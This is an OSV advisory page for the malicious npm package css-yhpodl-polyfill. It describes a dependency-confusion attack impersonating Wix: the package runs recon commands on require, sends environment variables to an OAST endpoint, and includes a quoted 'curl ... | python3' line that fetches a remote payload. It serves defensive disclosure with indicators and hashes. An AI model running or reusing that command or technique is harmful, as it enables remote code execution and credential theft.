MAL-2026-17578

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/css-yhpodl-polyfill/MAL-2026-17578.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17578
Published
2026-10-05T16:14:05Z
Modified
2026-10-05T16:31:36Z
Summary
Malicious code in css-yhpodl-polyfill (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5936fc65b4eba7b461c0eef7b66dfeecdc2da412f54fd667873e3e6950b0a857)

css-yhpodl-polyfill ships thunderboltRegistry.js which, as an IIFE executed on require, runs shell reconnaissance (id, whoami, env, ifconfig/ip addr, hostname) via child_process.execSync and sends the collected host identity and full environment variables via GET to the hardcoded Burp Collaborator OAST endpoint https://unl9pgk6ei4uf80n5tf4iktspjvbuzkn9.oastify.com/. The same file executes curl -L https://appsecc.com/py | python3, piping an attacker-controlled remote Python payload into python3 for arbitrary code execution on the installer host. The package name and exported identifiers (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) impersonate Wix's internal thunderbolt namespace, and registry-manifest.min.json references parastorage.com (Wix CDN) — the shape of a targeted dependency-confusion attack against the Wix engineering build pipeline. Installing or requiring this package exfiltrates environment secrets and grants remote code execution to the attacker.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-021075",
            "import_time":  "2026-10-05T16:22:56.749263298Z",
            "modified_time":  "2026-10-05T16:14:05Z",
            "sha256":  "5936fc65b4eba7b461c0eef7b66dfeecdc2da412f54fd667873e3e6950b0a857",
            "source":  "amazon-inspector",
            "versions":  [
                "1.0.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / css-yhpodl-polyfill

Package

Name
css-yhpodl-polyfill
View open source insights on deps.dev
Purl
pkg:npm/css-yhpodl-polyfill

Affected ranges

Affected versions

1.*
1.0.0

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "thunderboltRegistry.js",
            "sha256":  "098fac4f87d662808d1fcb744c79416ac42dd1ae997a1f96a998f2f3b46ce699",
            "tlsh":  "e07131b5b99df02166c33438db7f5049b4bb86672c6caee0740899b01f7585c01ba6f4"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "css-yhpodl-polyfill-1.0.0.tgz",
            "hashes":  {
                "sha1":  "debbd9cf7fd89ebc1b3427cbf2fc359987d4894d",
                "sha512_sri":  "sha512-oswywbFoijkgGvyOFTgnks8QB92LFOk+2erb5YFiB0mPjrB8hxhT9fQOTsZvQYxjUjBmfRlNAe3+loIbsXqPRA=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/css-yhpodl-polyfill/MAL-2026-17578.json"